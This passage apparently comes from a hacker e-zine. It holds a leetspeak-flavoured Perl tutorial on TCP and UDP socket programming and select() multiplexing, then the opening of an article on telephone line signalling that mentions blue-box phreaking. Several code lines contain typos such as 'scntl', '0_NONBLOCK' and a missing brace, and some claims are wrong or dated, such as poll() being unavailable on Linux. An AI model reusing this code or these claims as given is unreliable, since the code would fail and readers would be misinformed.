knowledge of Perl is required to follow my exanples (wh1ch 1s why j3w sh0uld
g0 r34d my 0th3r 4rt1cl3), and they are certainly clear enough for C/C++
programmers to follow (at least I hope they are).

This article is intended to serve as an introduction to network programming,
so it doesn't cover deeper topics such as protocol layering and routing, but
if your that interested you should go buy a book or look for more tutorials
on the web. Right then, lets get on with the file...


Networking Concepts
===================

This section is to basically cover the fundamentals of networking, so pay
attention (3sp3c14lly j3w l4m3rs). You will learn what the the necessary
components of network communication are and how a program uses them to build
a connection by following a simple program that retrieves networking
information and uses it to connect to another program. You should by the end,
have a pretty good understanding of network addresses, sockets and the diffs
between TCP and UDP.

Below is a simple program that uses a Perl function that creates a connection
to the server using TCP (makeconn), this function can be found in network.pl
which is included in the f41th 8 .zip file.

1: sub makeconn {
2:
3: my ($host, $portname, $server, $port, $proto, $servaddr);
4:
5: $host = $_[0];
6: $portname = $_[1];
7:
8: #
9: # Server hostname, port and protocol
10: #
11: $server = gethostbyname($host) or
12: die "gethostbyname: cannot locate host: $!";
13: $port = getservbyname($portname, 'tcp') or
14: die "getservbyname: cannot get port: $!";
15: $proto = getprotobyname('tcp') or
16: die "getprotobyname: cannot get proto: $!";
17:
18: #
19: # Build an inet address
20: #
21: $servaddr = sockaddr_in($port, $server);
22:
23:
24: #
25: # Create the socket and connect it
26: #
27: socket(CONNFD, PF_INET, SOCK_STREAM, $proto);
28: connect(CONNFD, $servaddr) or die "connect: $!";
29:
30: return CONNFD;
31: }


This procedure can be summerised in three basic steps:

o--> Build and address.
o--> Create a socket.
o--> Establish a connection.

The network address is built by retrieving address information in lines 11
13, and then assembling it in line 21. In line 27, you create the socket
using protocol information retrieved in line 15. In line 28 you finally
establish the connection.


Building Network Addresses
--------------------------

The steps involved in building a network address and connecting to it provide
a framework for observing how network communication werks. I'll spend some
time covering each part of this process in order to better prepare you for
the tutorials later on.

If you've ever configured a PC or workstation for Internet connectivity, you
have probably seen an IP address (y3s, 3v3n j00 l4m3rs) similar to 192.9.200.
10 or 10.7.8.14. This is called 'dotted-decimal format' and like many things
in computing, is a representation of network addresses that are intended to
make things easier for humans to read. The notation that computers, routers
and other internet devices actually use to communicate is a 32-bit number,
often called a 'canonical address'. When this number is evaluated, it is
broken down into four smaller 8-bit (one byte) values, much the way the
dotted-decimal format consists of four numbers seperated by decimals.

An 'internetwork', or 'internet' for short, consists of two or more networks
that are connected. Of course this refers to any two networks connected to
each other, not *the* Internet (I kn0w th4t d1s c0nfus3s s0m3 0f j00 l4m3rs).
The internet protocol (IP) was designed with this sort of topology in mind
(ie: millions of computers). In order for an internet address to be useful,
it has to be capable of identifying not only a specific node (c0mput3r), but
also which network it resides on. Both bits of information are provided in
the 32-bit address. Which portion of the address is related to each component
is decided by the 'netmask' that is applied to the address. Depending on an
organisations needs, a network architect can decide to have more networks or
more addresses. For details on subnetting networks do some searches for
TCP/IP Network Management or something along those lines. For the sake of
network programming, its enuff to know the information stored in an internet
address and that individual workstation netmasks have to be correct in order
for a message to be successfully delivered.

Dotted-decimal format is easier to read than 32-bit values, but even so, most
ppl would rather use names than numbers because wikkid or www.hackernews.com
is a lot easier to remember than 12.145.27.2 or 192.148.252.39. For this
reason, the notion of hostnames, domain names, and the domain name system
were invented. You can get access to a database of name-to-number mappings
through a set of 'network library functions', which provide host (n0de)
information in response to names ro numbers. For example, in line 11 of the
makeconn listing above, you retrieve the address associated with a name with
one of these functions - gethostbyname().

Depending on the host configuration, gethostbyname() can retrieve the address
associated with a name from a file, /etc/hosts, from the Domain Name System
(DNS), or from the Network Information System (NIS or Yellow Pages). DNS and
NIS are network-wide-services that administrators use to implify network
configuration because adding and updating network address numbers from a
central location (and maybe a backup location) is obviously a lot easier
than updating files on every workstation individually. These systems
  
are
also useful for internetworks because the address of a remote host can be
determined when it is needed by making a DNS request, rather than needing
to exchange configuration files in advance.

One other advantage of using names is that the address that a name is
associated with can be changed without affecting applications because the
application need only know the name, the address can be discovered at
runtime.

The following perl script illustrates the use of the gethostbyname()
function and the difference between dotted-decimal formatted addresses and
canonical address (type it up and save it as 'resolv'):

1: #!/bin/perl
2: use Socket;
3: $addr = gethostbyname($ARGV[0]);
4: $dotfmt = inet_ntoa($addr);
5: print "$ARGV[0]: numeric $addr dotted: $dotfmt\n";


Line 2 includes the Socket module included with Perl 5 distributions. This
module is required for all the sample code included in this article.

When you run this program, passing it a hostname that you want to see info
on, you will se something like this:

zomba@noday$ ./resolv www.attrition.org
www.attrition.org: numeric: [unprintable characters] dotted: 128.11.253.197

Line 3 passes the name specified on the command line to gethostbyname(),
which places the canonical address in $addr. This address is then passed to
inet_ntoa(), which returns the same address in dotted-decimal format.
(inet_ntoa is an abbreviation for internet number to ASCII). You then print
both numbers out in line 5. As you can see, the 32-bit address looks pretty
damn weird when printed.


Network Services
----------------

Being able to locate a computer is a fundamental part of network
communication, but it is not the only necessary component in an address. Why
do you want to contact a specific host? Do you want to retrieve an HTML doc
from it? Do you want to log in and check mail?. Most workstations, especially
those running Linux or any other version of UNIX, provide more thna one
service to other nodes on a network.

Back in line 13 of the makeconn listing, a function called getservbyname()
was called. This function provides the other value used to form the complete
network address. This value, referred to as the 'service port number', is the
portion of the address that specifies the service or program that you want to
communicate with.

Like host addresses, service ports can be referred to by name instead of
number. getservbyname() retrieves the number associated with the name
specified from the file /etc/services. (if NIS is available, the number can
also be retrieved from a network database). Port numbers that are listed in
this database are called 'well-known ports' because, in theory, any host can
connect to one of these services on any other because the numbers at least
ought to remain consistant. The port numbers that are used by applications
don't have to be listed in or retrieved from this database, it's just
considered a good idea to list them in /etc/services and share them in
order to prevent conflicts.

After you have retrieved the two components necessary to build a fully
qualified address, you provide them to the sockaddr_in function, which builds
a SOCKADDR_IN structure for us. SOCKADDR_IN is the programmatic
representation of a network address needed for most socket system calls.


Sockets
-------

Before you can use your addressing information you need a socket. The
socket() function in line 27 of the makeconn listing illustrates how to
create one. Some simple explanations of what sockets are and the types
available to a program first will help explain the function.

'Sockets' are an Application Running Interface (API) used for network
communication. This API was first available for BSD UNIX for the VAX
architecture in the early eighties, but is now used on almost all UNIX
versions and Microshaft, being late as always has also recently added them
to Windows. System V UNIX has a different interface called the Transport
Layer Interface (TLI), but even most system V UNIX version, such as Solaris
2.x, provide socket interfaces. Linux provides a full implementation of the
socket interface.

Socket applications treat network connections, or to be more exact, network
'endpoints', the same way most UNIX interfaces are handled - as file handles.
The reason for the endpoint qualification is simple: Not all network sessions
are connected, and referring to all network streams as connections can be
incorrect and misleading. As a matter of fact, after a network endpoint is
created and bound and/or connected, it can be written to, read from, and
destroyed using the same functions as files. Because of this interface,
socket programs tend to be portable between different version of UNIX and
frequently many other OS's.


Protocols and Socket Types
--------------------------

The socket API is designed to support multiple protocols, called 'domains' or
'families'. Most UNIX versions support at least two domains: UNIX and
Internet. (Two of the other domains are Xerox Network system and ISO protocol
suite). UNIX domain sockets use the local workstation filesystem to provide
communication between programs running on the same workstation only. Internet
domain sockets use the Internet Protocol (IP) suite to communicate over the
network. As you might guess, this file is concerned with Internet domain
sockets.

In the following call to socket(), you specify the scaler variable that you
want to have the socket descriptor stored in and three values that describe
the type of socket you want to have created - the protocol family, the socket
type, and the protocol. I've already covered which protocol family you will
use which is PF_INET, for the Internet:

socket(CONNFD, PF_INET, SOCK_STREAM, $proto);

The possible socket types are SOCK_STREAM, SOCK_DGRAM, SOCK_RAW, SOCK_RDM and
SOCK_SEQPACKET. The last three are used for low level, advanced operations
and are beyond the scope of this article.

SOCK_STREAM sockets are connected at both ends, they are reliable, and the
messages between them are sequenced. When I say reliable I don't mean that if
it says it'll pick the kids up from skewl then it will kind of reliable, I
mean that the network guarantees delivery: An application can write a packet
with the understanding that it will arrive at the other end, unless the
connection is suddenly broken by some unforeseen event, like some twat
pulling the power cord on the host machine.. In the event that the connection
is broken, the application will receive timely notification. Sequencing
means that all messages are delivered to the other application in the exact
order that they are sent.

SOCK_DGRAM sockets support connectionless and unreliable datagrams. A
'datagram' is typically a fixed-length small message. Applications ahve no
guarantee that datagrams will be delivered, or the order they will arive in.
On the surface, it seems that no application would ever want to use
SOCK_DGRAM, but as you will see, many applications do for good reasons.

The type of socket is very closely related to the protocol that is used. In
the case of the Internet suite, SOCK_STREAM sockets always implement TCP,
and SOCK_DGRAM sockets implement UDP.

The characteristics of the TCP protocol match the characteristics of
SOCK_STREAM. TCP packets are guarunteed to be delivered except in a network
disaster, such as the workstation on the other end of the connection dropping
out, or the network itself suffering a serious, unrecoverable outage. Packets
are always delivered in the same order that they are written. Obviously,
these properties make the job of a network developer very easy because a
message and pretty much forgotten about, but as always, there is a cost. TCP
messages are much more expensive (demanding) than UDP messages in terms of
both network and computing resources. The workstations at both ends of a
session have to confirm that they have received the correct information,
which results in more work for the operating system and more network traffic.
The systems also have to track the order in which the messages were sent, and
often have to store messages until others arrive, depending on the state of
the network "terrain" between the two workstations. (New messages can arrive
while others are being retransmitted because of an error). In addition, the
fact that TCP connections are just that, connections, means that they have a
price. Every conversation has an endpoint associated with it, so a server
that has more than one client has to switch between multiple sockets, which
can be very difficult (have a look at the section on I/O Multiplexing with
TCP covered later on in this article).

UDP, like SOCK_DGRAM, is connectionless and unreliable. Applications have to
provide whatever reliability mechanisms are necessary for the job that they
are performing. For some applications, that is an advantage because all of
the mechanisms provided by TCP aren't always needed. For example, DNS, which
uses UDP, simply sends a message and wiats for a response for a predetermined
interval, because DNS is a one-to-one message-to-response protocol,
sequencing between client and server is not necessary. UDP is connectionless,
so a server can use one socket to communicate with many clients. All clients
write to the same address for the server, and the server responds
individually bu writing to specific client addresses.

UDP messages can also be broadcast to entire networks, which is a blessing to
the application that needs to communicate one message to many users, but a
curse for the workstations that don't need the message but have to read it in
order to figure out that its not actually meant for them afterall. The
ability to broadcast messages over UDP and the fact that the connectionless
aspect of UDP makes it difficult to verify the source of messages are two of
the reason why many networking people consider the protocol to be a security
risk and dislike even enabling it within their organisations.


Making a Connection
-------------------

Logically, if you are creating a connection like that of the makeconn()
function listed earlier, you need to create a SOCK_STREAM socket with the TCP
protocol information retrieved with getprotobyname() in line 15. Take a look
at lines 27 and 28 from that listing repeated below:

27: socket(CONNFD, PF_INET, SOCK_STREAM, $proto);
28: connect(CONNFD, $servaddr) or die "connect: $!";

After creating the socket in line 27, you then pass it to connect() with the
address structure created by sockaddr_in(). The connect() function actually
contacts the address specified in the structure and establishes the virtual
circuit supported by TCP.


A TCP Client Example
--------------------

The following listing puts makeconn() to work in a sample program. This
should be typed up in vi and saved as 'client1'.

#!/usr/bin/perl
use Socket;
require "./network.pl";

$NETFD = makeconn($ARGV[0], $ARGV[1]);

#
# Get the message
#
sysread $NETFD, $message, 32768 or die "error getting message : $!";
print "$message \n";
close $NETFD;


Run this program with two command-line arguments, the name of a Linux host
that is running sendmail and the email port number, smtp:

zomba@poo$ ./client1 brown smtp
220 brown.poo.com ESMTP Sendmail 8.8.5/8.8.5; Sat, 20 Jun 1999 18:24:08 -0400

This program uses makeconn() to connect to the sendmail program running on
the named host and reads the greeting that it sends to a new client when it
first connects, using the sysread() function.

sysread() is one of the functions used for exstracting network messages from
sockets. It is a wrapper for the UNIX read() system call. You cannot use the
Perl read() function because it is designed for standard I/O, which uses
buffering and other high-level features that interfere with network
communications. In a real-world application, you would prbably read messages
with sysread() in and out of a buffer of your own and keep acreful track of
what you had just read because it is possible to be interrupted in a read
call by a signal. (you would also install signal handlers). As this example
demonstrates, establishing a client connection and retrieving some data is
pretty simple.


A TCP Server Example
--------------------

Now its time to write your own server for client1 to connect to. Fisrtly you
have to place a socket in the listen state. You'll use another function that
is defined in network.pl called makelisten(), whoch is shown in the listing
below:

1: sub makelisten {
2:
3: my ($portname, $port, $proto, $servaddr);
4: $portname = $_[0];
5:
6: #
7: # port and protocol
8: #
9: $port = getservbyname($portname, 'tcp') or
10: die "getservbyname: cannot get port : $!";
11: $proto = getprotobyname('tcp') or
12: die "getprotobyname: cannot get proto : $!";
13:
14: #
15: # Bind an inet address
16: #
17: socket(LISTFD, PF_INET, SOCK_STREAM, $proto);
18: bind (LISTFD, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
19: listen (LISTFD, SOMAXCONN) or die "listen: $!";
20: return LISTFD;
21: }


The makelisten() function creates a TCP socket, binds it to a local address,
and then places it in the listen state.

Lines 9 and 11 retrieve the same information that makeconn() retrieves in
order to create a connection, with the exception of an internet address.
makelisten() then creates an internet family SOCK_STREAM socket, which by
definition is a TCP socket, but you specifiy this explicitely anyway, as you
do in makeconn().

In line 18, the socket is bound to a local address. This tells the system
that any messages sent to the specified service port and internet address
should be relayed to the specified socket. You use sockkaddr_in() to build
an address from the service port retrieved with getportbyname() and with a
special address that corresponds to all addresses on the workstation so that
connections can be made to all network interfaces and even over any dial-up
interfaces on the workstation. This function shows a little laziness in that
it passes the sockaddr_in() function to bind() instaed of calling it
seperatly and saving the results.

There are some restrictions on what service ports can be bound. For
historical reasons, only the programs executing with root access can bind
service ports numbered lower than 1024.

After the socket is bound, you can execute listen(), which notefies the
system that you're ready to accept client connections.

server1, the prgram that uses makelisten(), is just as simple as the client
and is shown below.


#!/usr/bin/perl
use Socket;
require "./network.pl";

$hello = "Hello world!";

$LISTFD = makelisten("test");

LOOP: while (1) {
unless ($paddr = accept(NEWFD, $LISTFD)) {
next LOOP;
}
syswrite(NEWFD, $hello, length($hello));
close NEWFD;
}


In the above listing, you simply place a socket in the listen state using
makelisten() and then enter a while loop that centres on the function
accept(). The purpose of accept() is exactly as it sounds: It accepts client
connections. You pass two arguments to accept(): a new variable (NEWFD) that
will contain the socket identifier for the accepted connection and the
socket ($LISTFD) that has been set up with listen().

Whenever accept() returns a connection, you write a string to the new socket
and immediately close it.

Before you can test your server, you need to add the entry for the test
service that it uses. Add the following three lines to the /etc/services
file. You will have to su to root to do this.

test 8000/tcp
test 8000/udp
test1 8001/udp

You have added three entries for your test programs, one for TCP and two
others for UDP that will be used later.

Now to test your server, you need to execute the following commands:

$ ./server1&
$./client1 iest test
Hello world!

iest is the hostname of your workstation (ie: lameasfuck). The server
writes back your greeting and exits. Because the server is executing inside
a while loop, you can run ./client1 repeatedly. Whe the test is finished,
use kill to stop the server:

$ ps ax| grep server1 | awk '{ print $1 }'
pid
$ kill pid


A UDP Example
-------------

To implement the same test in UDP, you have to set up a SOCK_DGRAM socket
for both a client and a server. This function, makeudpcli() can also be
found in network.pl and is shown below:


sub makeudpcli {

my ($proto, $servaddr);

$proto = getprotobyname('udp') or
die "getprotobyname: cannot get proto : $!";

#
# Bind a UDP port
#
socket(DGFD, PF_INET, SOCK_DGRAM, $proto);
bind (DGFD, sockaddr_in(0, INADDR_ANY)) or die "bind: $!";

return DGFD;
}


In this listing you retrieve the protocol information for UDP and then create
a SOCK_DGRAM socket. You then bind it, but you tell the system to go ahead
and bind to any address and any service port, in other words, you want the
socket names but you don't care what the name is.

The reason for this extra bind() is quite straightforward. Because USP is
connectionless, special attention has to be made to addresses when sending
and receiving datagrams. When message datagrams are read, the reader also
receives the address of the originator so that it knows where to send any
replies. If you want to receive replies to your messages, you need to
guaruntee that they come from a unique address. The call to bind() ensures
that the system allocates a unique address for you.

Now that you have created a datagram socket, you can communicate with a
server, using the program listing below, client2.


1: #!/usr/bin/perl
2:
3: use Socket;
4: require "./network.pl";
5:
6: $poke = "yo!";
7:
8: $NETFD = makeudpcli();
9:
10: #
11: # Work out server address
12: #
13: $addr = gethostbyname($ARGV[0]);
14: $port = getservbyname($ARGV[1], 'udp');
15:
16: $servaddr = sockaddr_in($port, $addr);
17:
18: #
19: # Poke the server
20: #
21: send $NETFD, $poke, 0, $servaddr;
22:
23: #
24: # Recv the reply
25: #
26: recv $NETFD, $message, 32768, 0 or die "error getting message : $!";
27: print "$message \n";
28: close $NETFD


After you create the socket, you still have to create the server address, but
instead of providing this address to the connect() function, you have to
provide it to the send() function in Line 21 so it knows where to send the
message (funn1ly enuff). You might be wondering why you send anything to the
server at all because in the TCP example, the communication is one way.

In the TCP example, the server sends a message as soon as you connect and
then closes the session. The act of connecting is in effect a message from
the client to the server. Because UDP lacks connections, you have to use a
message from the client as a trigger for the conversation.

The server creates a UDP socket in a lsightly different manner because it
needs to bind a well-known port. It uses getservbyname() to retrieve a
port number and specifies it as part of the call to bind(). Look at
makeudpserv() in network.pl for details.

The servers main loop is actually pretty close to that of the TCP server and
is shown below, server2:


#!/usr/bin/perl
#
#
use Socket;
require "./network.pl";

$hello = "Hello world!";

$LISTFD = makeudpserv("test");

while (1) {
$cliaddr = recv $LISTFD, $message, 32768, 0;
print "Recieved $message from client\n";
send $LISTFD, $hello, 0, $cliaddr;
}


Instead of waiting for a client by looping on the accept() function, the
server loops on the recv() function. There is also no new socket to close
after the reply is sent to the client.

When thse programs are run, you see the following:

$ ./server2&
$./client2 iest test
Received yo! from client
Hello world!

So you see that from a programmers standpoint, the differences between TCP
and UDP affect not only the socket functions you use and how you use them,
but also how you design your programs. Differences such as the lack of a
connection and the lack of built-in reliability mechanisms must be seriously
considered when you design an application. There is no guaruntee, for
example, that the server in this section ever receives your poke message.
For that reason, a mechanism such as a timer would would be employed in a
real-world application.


Blocking Versus Nonblocking Descriptors
---------------------------------------

So far, all the examples in this article have relied on blocking I/O.
Certain operations, such as reading, writing and connecting or accepting
connections, are set to block when they wait for completeion, which brings a
program (or thread) to a halt. After server1 sets up a listen, for example,
it enters a while loop and calls accept(). Until a client connects to a
listening socket, the program is halted. It doesn't repeatedly call accept(),
it calls it once and blocks. This is also true of client2, which blocks on
the recv() call until the server replies. If the server is unavailable, the
program will block forever. This si especially unwise for an application
that uses UDP, but how could a timer be implemented if the call to recv()
will never return?

Writing can also block on TCP connections when the receiver of the data
hasn't read enough data to allow the current write to complete.. In order to
remain reliability and proper flow control, the systems on both ends of a
connection maintain buffers, usually about 8192 bytes. If these buffers are
full in either direction, communication in that direction will stop until
some space is freed up. This is yet another concern for servers that are
writing large messages to clients that aren't running on very powerful
systems or are on remote networks with low bandwidth links. In these
situations, one client can slow things down for everyone.

Blocking I/O is acceptable for programs that don't have to maintain GUI's
and only have to maintain one communication channel. Of course, most
programs cannot afford to use blocking communications.

I/O is said to be 'nonblocking' when an operation returns an error or
status code when it cannot be completed. To demonstrate this, run client2
without running the server. It will start and not return until you halt
it by pressing Ctrl+C.

Now run nonblock:

$ ./nonblock
error getting message : Try again at ./nonblock line 30

You receive the Try again message from the recv() function.

nonblock, shown below, is a modefied version of client2, which was shown
earlier in the article.


1: #!/usr/bin/perl
2: use Socket;
3: use Fcntl;
4: require "./network.pl";
5: $poke = "yo!";
6: $NETFD = makeudpcli();
7: scntl $NETFD, &F_SETFL, 0_NONBLOCK or die "Fcntl failed : $!\n";
8: (rest of file remains the same)


A new module, Fcntl, is added to the program in line 3, which provides an
interface to the fcntl(2) system call. It is used to alter file descriptor
properties, such as blocking and how to handle certain signals. In line 7,
the last line of modefications to client2, you set the 0_NONBLOCK flag for
the UDP socket. The rest of the prog is unchanged.

When nonblocking I/O is used, the application designer has to be very
careful when handling errors returned from recv(), send() and other I/O
related functions. When no more data is available for reading or no more
data can be written, these funcions return error codez. As a result, the
application has to be prepared tohandle some errors as being routine
conditions. This is also true of the C/C++ interfaces.


I/O Multiplexing with UDP
-------------------------

Frequently, applications need to maintain more than one socket or file
descriptor. For example, many system services such as Telnet, rlogin, and
FTP are managed by one process on Linux. In order to do this, the process
(inetd) listens for requests for these services by opening a socket for each
one. Other applications such as Applix, Netscape, and Xemacs monitor file
descriptors for the keyboard, mouse, and maybe the network.

Lets set up an example that monitors the keyboard and a network connection.
The following listing should be named - udptalk.


1: #!/usr/bin/perl
2:
3: use Socket;
4: require "./network.pl";
5:
6: $NETFD = makeudpserv($ARGV[2]);
7:
8: $addr = gethostbyname($ARGV[0]);
9: $port = getservbyname($ARGV[1], 'udp');
10:
11: $servaddr = sockaddr_in($port, $addr);
12:
13: $rin = "";
14: vec($rin, fileno(STDIN), 1) = 1;
15: vec($rin, fileno($NETFD), 1) = 1;
16:
17: while (1) {
18:
19: select $ready = $rin, undef, undef, undef;
20:
21: if (vec($ready, fileno(STDIN), 1) == 1) {
22: sysread STDIN, $mesg, 256;
23: send $NETFD, $mesg, 0, $servaddr;
24: }
25: if (vec($ready, fileno($NETFD), 1) == 1) {
26: recv $NETFD, $netmsg, 256, 0;
27: print "$netmsg";
28: $netmsg = "";
29: }
30: }
31: close $NETFD;


In order to test this program, it must be run in either two windows on the
same system, or on two different systems. At one command-line session,
execute the following command, where 'iest' is the host on which the second
command will be run:

$ ./udptalk iest test test1

On the second host, run the following command, where 'iest' is the host on
which the first command was run:

$ ./udptalk iest test1 test

Each session will wait for keyboard input. Each line that is typed by one
program is printed by the other, after you press Enter.

In order to perform the two-way communication required for this, both
instances of udptalk have to bind to a well-known port. To permit this on a
single workstation, the program accepts two port names as the second and
third command line arguments. For obvious reasons, two programs cannot
register interest in the same port.

In line 6 of the above listing, udptalk uses makeudpserv() to create a UDP
socket and bind it to a well known port.. For the examples here I used 8000
for one copy and 8001 for the other.

In lines 8-11, you perform the usual procedure for building a network
address. This will be the address to which the keyboard input is written.

Lines 13-15 build bit vectors in preperation for the select() function. In
perl, a 'bit vector' is a scaler variable that is handled as an array of
bits, ie: instead of being evaluated as bytes that add up to characters or
numbers, each individual bit is evaluated as a distinct value.

In line 13, you create a variable ($rin) and tell the perl interpreter to
clear it. You then use the vec() and fileno() functions to determine the
file number for STDIN (the keyboard) and set that bit in $rin. Then you do
the same for the socket created by makeudpcli(). Therefore, if STDIN uses
file descriptor 1 (which is generally the case), the second bit in $rin is
set to 1. (bit vectors,, like other arrays, start numbering indexes at zero).
Fortunatley, the vec() function can be used to read bit vectors also, so you
can treat these data structures as opaque (which is nice :)).

select() is a key function for systems programmers. Sadly, it suffers from
an arcane interface that is intimidating in any language. System V UNIX has
a replacement, poll(), that is a little easier to use, but it is not
available on Linux or within Perl. The following is the function description
for select():

select readfds, writefds, exceptfds, timeout;

Like most of the UNIX system interface, this is virtually identical to
select() in C/C++. select() is used for discovering which file descriptors
are ready for reading, are ready for writing, or have an exceptional
condition. An exceptional condition usually corresponds with the arrival
of 'out-of-band' or urgent data. This data is most frequently associated
with TCP connections. When a message is sent out-of-band, it is tagged as
being more important than any previously sent data and is placed at the top
of the data queue. A client or server can use this to notify the process on
the other end of a connection that is existing immediately.

The first three arguments are bit vectors that correspond to the file
descriptors that you are interested in reading or writing to or that you are
monitoring for exceptional conditions. If you aren't interested in a set of
file descriptors, you can pass undef instead of vector. In the udptalk
listing, you aren't interested in writing or exceptions, so you pass undef
for the second and third arguments.

When select returns, only the bits that correspond to files with activity
are set, if any descriptors aren't ready when select returns, their
settings are lost in the vector.. For that reason, you have select() create
a new vector and copy it into $ready. This is done by passing an assignment
to select() as the first argument in line 19.

The last parameter is the time-out interval in seconds. select() waits for
activity for this period. If the period expires with no activity occuring,
select() will return with everything in the vector cleared. Because undef
is supplied for timeout in line 19, select() will blobk until a file is
ready.

Inside the while-loop entered in line 17, you call select(), passing it the
bit vector built earlier and the new one to be created. When it returns, you
check the vector using vec() with pretty much the same syntax as you used to
set the bits, however, because you are using == instead of =, vec() returns
the value of the bit instead of setting it.

If the bit for STDIN is set, you read from the keyboard and send it to the
other instance of udptalk. If the bit for the socket is set, you read from
it and print it to the terminal. This sequence illustrates a very important
advantage of the sockets interface. The program is extracting data to and
from the network using the same functions as the keyboard and screen.

This program is called 'multiplexing' and is the loop at the core of many
network-aware applications, although the actual mechanisms can be concealed
by sophisticated dispatchers or notifiers that trigger events based on
which connection is ready to be read from or written to.. Something else
missing in the udptalk listing is the minimum amount of error checking and
signal handling that cleans up connections when a quit signal is received.


I/O Multiplexing with TCP
-------------------------

In order to demonstrate TCP multiplexing, it is necessary to create different
programs for the client and server. The server, tcplisten, is shown below
and is the one that requires the most scrutiny. The client, tcptalk is very
similar to the server and so I won't print it, but I will explain how the
client works as I cover the server.

1: #!/usr/bin/perl
2:
3: use Socket;
4: require "./network.pl";
5:
6: $NETFD = makelisten($ARGV[0]);
7:
8: while (1) {
9:
10: $paddr = accept(NEWFD, $NETFD);
11:
12: ($port, $iaddr) = sokaddr_in($paddr);
13:
14: print "Accepted connection from ", inet_ntoa($iaddr),
15: " on port number ", $port, "\n";
16:
17: $rin = "";
18: vec($rin, fileno(STDIN), 1) = 1;
19: vec($rin, fileno(NEWFD), 1) = 1;
20:
21: while (1)
22:
23: select $ready = $rin, undef, undef, undef;
24:
25: if (vec($ready, fileno(STDIN), 1) == 1) {
26: sysread STDIN, $mesg, 256;
27: syswrite NEWFD, $mesg, length($mesg);
28: }
29: if (vec($ready, fileno(NEWFD), 1) == 1) {
30: $bytes = sysread NEWFD, $netmsg, 256;
31: if ($bytes == 0) { goto EXIT; }
32: print "$netmsg";
33: $netmsg = "";
34: }
35: }
36: EXIT; close NEWFD;
37: print "Client closed connection\n";
38: }
39:
40: close $NETFD;


The server creates a listening socket in line 6 and then immediately enters a
while loop. At the top of the loop is a call to accept(). By placing this in
a loop, the server can repeatedly accept client connections, like the other
TCP server. The listen socket, $NETFD, can accept more than one connection,
regardless of the state of any file descriptors cloned from it using
accept().

accept() returns the address of the connecting client. You use this address
in lines 12 and 14 to print out some information about the client. In line 12
you use sockaddr_in() to reverse engineer the fully qualified address back
into a network address and a service port. Then you use print to display it
on the terminal. Note the call to inet_ntoa() embedded in the print command.

Then you set up for a select() loop using almost the same code as in the
udptalk listing. There is, however, a key difference in the way the network
connection is handled. You are reading with sysread() again, but you are
saving the return value.

When a peer closes a TCP connection, the other program receives an EOF
indication. This is signified by marking the socket as ready for reading
and returning zero bytes when it is read.. By saving the number of bytes
returned by sysread(), you are able to detect a closed connection and record
it and then return to accept() at the top of the outer while loop.

The following is a server session, followed by a client session that is
communicating with it. The client tcptalk, is a copy of tcplisten.

$ ./tcplisten test
Accepted connection from 10.8.100.20 on port number 29337
Hello, world.
Goodbye, cruel....
Client closed connection


$ ./tcptalk iest test
Hello, world.
Goodbye, cruel....
^C


Advanced Topics
---------------

One of the biggest issues of TCP applications is queueing messages. Depending
on the nature of the data being transferred, the network bandwidth available,
and the rate at which clients can keep pace with the data being delivered,
data can be queue up. Experienced application desingners geberally specify a
queuing mechanism and the rules associated with it as part of the initial
product description.

UDP applications have to wrestle with data reliability, and some schemes rely
on message sequence numbers. All nodes involved in a transaction (or a
series of transactions) keep track of a numbering scheme. When a node
receives a message out of order, it sends a negative acknowledgement for the
message that it missed. This sort of scheme greatly reduces traffic when
everything goes well but can become very expensive when things fall out of
sequence.

Some applications can use asynchronous I/O in order to service network
traffic and other tasks in a single application. This scheme registers
interest in a signal that can be delivered whenever a file descriptor has
data ready to be read. This ,ethod is not recommedned though, because only
one signal can be delivered for all file descriptors (so select() would still
be needed) and because signals are not reliable.

Secur1ty is always a big issue, regardless of the protocols being used. UDP
is being used less and less over the Internet, essentially because it is very
easy to impersonate a host when no connections are required. Even TCP
connections, however, can be spoofed by someone who has an understanding of
the Internet Protocol and WAN technology. For that reason, applications that
require a high level of security don't rely on TCP to keep them secure and
tend to use encryption and authentication technology.


Summary
-------

Okay, this article covers a lot of ground in a short time. I can't be bothered
to write a proper summary so this is gonna be it, I hope that this has given
you enough information but if not then you can just mail me at the address at
the top of this file. Peace.


Shouts
------

[hybrid] [jasun] [force] [shadowx] [knight] [devious] [frink] [sintax]


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Network Signalling ]:::[OO--[ by shadowx ]--[ ]:::::::::::::::::::
-->[OO]:::::::::::::::::::::::::::::::[ ]:::::::::::::::::::::::::::::::::::

Signalling Between your Phone
and the Network

By Shadow-x

~~~~~~~~~~~~~~~~~~~~~

So you pick up your phone dial the number and your call is connected,
but how does the information get sent from your phone to the network in
the first place?
Call setup information can only be sent within the bandwidth
restrictions established for voice communications. This means that any
signalling between telephone set and the telephone network must happen
within the frequency confines of the 4,000 Hz bandwidth restrictions.

Excuse the crap ascii art,


In Band Signalling
| <---------------><------> Out of Band Signalling
|__________________________> Hz
^ ^ ^
300 3,300 4,000

Signalling information sent as tones or pulses within the standard
voice bandwidth are called in band signals, where those sent at
frequencies outside of the standard frequency range are called out of
band signals. The reason the CCITT5 telephone system was so heavily abused
was because it allowed its trunks to be seized through in band signalling.
So tones used to set up calls at the local exchange could be made from
any regular phone, allowing any phone phreak with a blue box to create the
tones to gain as much control over the line as the local operator. On the
modern C7 system all this is done in the out of bandwidth area.
As the network is an electrical device it requires a closed, or
continuous path over which current can flow between the network and your
phone (aka your phone line). When an electrical switch is opened, the path
is broken and no current can flow so electrical power stops. When the
electrical switch is closed, current can now flow over the continuous path
and electrical power is available.
It is this presence of electrical current that provides the initial
signalling to the telephone network that a caller wants to place a telephone
call. When the telephone receiver is resting in the cradle of the telephone
set the switch hook is depressed which opens the path for current flow from
the telephone network and no current is allowed to flow, this is referred
to as the 'on hook position'.
When the receiver is lifted, the switch hook button is released and the
path for current from the telephone network is completed, which is referred
to as the 'off hook' position. Power for your phone line is now supplied
from a battery located at the central office. The electric current now
flowing from the central office to your line is known as the
loop current. This loop of wire that extends from the central office to the
customers line and back to the central office is referred to as the local
loop.


Switch hook
************ ***** ***********
*telephones*------*-\-*------------------*Central *
*electronic* * * Tip & Ring *Office *
*components*------*-\-*------------------*(battery)*
************ ***** ***********
(this switch is closed
when the receiver is
off hook)

When the telephone network detects the flow of loop current to the
telephone set, it sends a tone down the line to the telephone set
receiver which is referred to as the 'dial tone'. This is a notification
from the network to let you know that it is ready to receive your dialing
instructions. The dial tone is actually a combination of 350hz and 440hz
sine waves (for all of you with blue beep). These frequencies are both
within the 4,000 hz voice bandwidth.

so what about the dialing mechanism for the phone?

